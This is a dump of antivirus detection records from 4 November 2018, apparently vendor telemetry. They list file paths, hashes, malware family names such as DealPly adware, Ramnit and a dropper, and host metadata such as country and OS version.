  Row(detection=Row(filename='avscan-20181104-174750-ca63c417', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-174750-CA63C417', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:47:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Windows.old.000\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:12:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:38:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120935-163930b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8748c67e\\AVSCAN-20181104-120656-00F74416\\AVSCAN-20181104-120935-163930B4', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:09:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195549-8be0cb42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-195549-8BE0CB42', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011759-01346479', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-011759-01346479', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:15:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163549-38ec3d9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-163549-38EC3D9B', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130054-545b1313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-130054-545B1313', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:00:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153951-5e01cfb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa200c1\\AVSCAN-20181104-153257-26C48B62\\AVSCAN-20181104-153951-5E01CFB4', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:39:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-232340-823be029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89e497ab\\AVSCAN-20181103-230631-1EB43BCA\\AVSCAN-20181103-232340-823BE029', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:47:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194805-48914564', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-194805-48914564', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:48:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113707-2e17e7cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113707-2E17E7CB', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:37:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-233206-b32dcd4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89e497ab\\AVSCAN-20181103-230631-1EB43BCA\\AVSCAN-20181103-233206-B32DCD4F', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:38:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113823-37c5007e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113823-37C5007E', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092642-8fbdc290', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23d9098e\\AVSCAN-20181104-091720-4E8FDD76\\AVSCAN-20181104-092642-8FBDC290', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:26:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='\\\\?\\C:\\Windows.old.000\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:12:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125936-4a036442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-125936-4A036442', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylive.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe.vir', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:40:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093012-a812d980', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23d9098e\\AVSCAN-20181104-091720-4E8FDD76\\AVSCAN-20181104-093012-A812D980', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:30:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154238-7454288f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa200c1\\AVSCAN-20181104-153257-26C48B62\\AVSCAN-20181104-154238-7454288F', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylivehandler.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe.vir', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:40:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113349-14c54390', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113349-14C54390', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011328-d9df5222', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-011328-D9DF5222', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:11:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093043-aba9c042', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23d9098e\\AVSCAN-20181104-091720-4E8FDD76\\AVSCAN-20181104-093043-ABA9C042', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:30:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125712-36ac83c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-125712-36AC83C3', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:57:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195055-61378c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-195055-61378C37', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:50:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153541-3c9c6ee6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa200c1\\AVSCAN-20181104-153257-26C48B62\\AVSCAN-20181104-153541-3C9C6EE6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:35:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174747-ca202a71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-174747-CA202A71', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:47:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132423-8ccf8064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8748c67e\\AVSCAN-20181104-120656-00F74416\\AVSCAN-20181104-132423-8CCF8064', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:24:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011804-01ea3eba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-011804-01EA3EBA', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:16:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-004643-f0cd48a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-004643-F0CD48A6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075812-448037b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9446ec41\\AVSCAN-20181104-075426-83CE7E3D\\AVSCAN-20181104-075812-448037B6', filesize=2560000, name='TR/Dropper.Gen.#M1.#R1'), hash='5f6d91dc158563cdc7ff95397bffd5c02f5a48b3424dbfaf5e557e1bbfd7e2b0', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T06:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='up.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\QBF4CEG69X\\up.exe', filesize=2560000, name='TR/Dropper.Gen.#M300.#R4133'), hash='5f6d91dc158563cdc7ff95397bffd5c02f5a48b3424dbfaf5e557e1bbfd7e2b0', metadata=Row(cmdline='\\\\\\/autorun \\\\\\/AdvanceScan', country='HU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\AutoCare.exe', parentsize=1732880, timestamp='2018-11-04T06:53:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wsfacf1429558a55def27e5f106b5723eec-78c4.htm', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\autocad 2010 32 bit\\autocad_2010_english_mld_win_32bit\\x86\\acad\\program files\\root\\common files folder\\autodesk shared\\adlm\\r1\\cs-cz\\help\\sam\\files\\WSfacf1429558a55def27e5f106b5723eec-78c4.htm', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f78f4cd824c1dd4801655422055a4f1e4daa2cd7da56b6881f30fbddba6fe17', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:28:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wsfacf1429558a55def27e5f106b5723eec-78c4.htm', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\autocad 2010 32 bit\\autocad_2010_english_mld_win_32bit\\x86\\acad\\program files\\root\\common files folder\\autodesk shared\\adlm\\r1\\pl-pl\\help\\sam\\files\\WSfacf1429558a55def27e5f106b5723eec-78c4.htm', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f78f4cd824c1dd4801655422055a4f1e4daa2cd7da56b6881f30fbddba6fe17', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:30:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lan5810wr0_lge.exe', filepath='D:\\ISMAEL\\LAN5810WR0_LGE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lan5800wr0_lge.exe', filepath='D:\\ISMAEL\\LAN5800WR0_LGE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9560d2w.exe', filepath='D:\\ISMAEL\\9560D2W.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='africa new.exe', filepath='D:\\Disque amovible\\AFRICA NEW.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='store-v2.exe', filepath='D:\\.Spotlight-V100\\Store-V2.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='store-v1.exe', filepath='D:\\.Spotlight-V100\\Store-V1.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.trashes.exe', filepath='D:\\.Trashes.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.fseventsd.exe', filepath='D:\\.fseventsd.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mes images.exe', filepath='D:\\Mes images.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ismael.exe', filepath='D:\\ISMAEL.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:55Z'), dt=datetime.date(2018, 11, 4)),
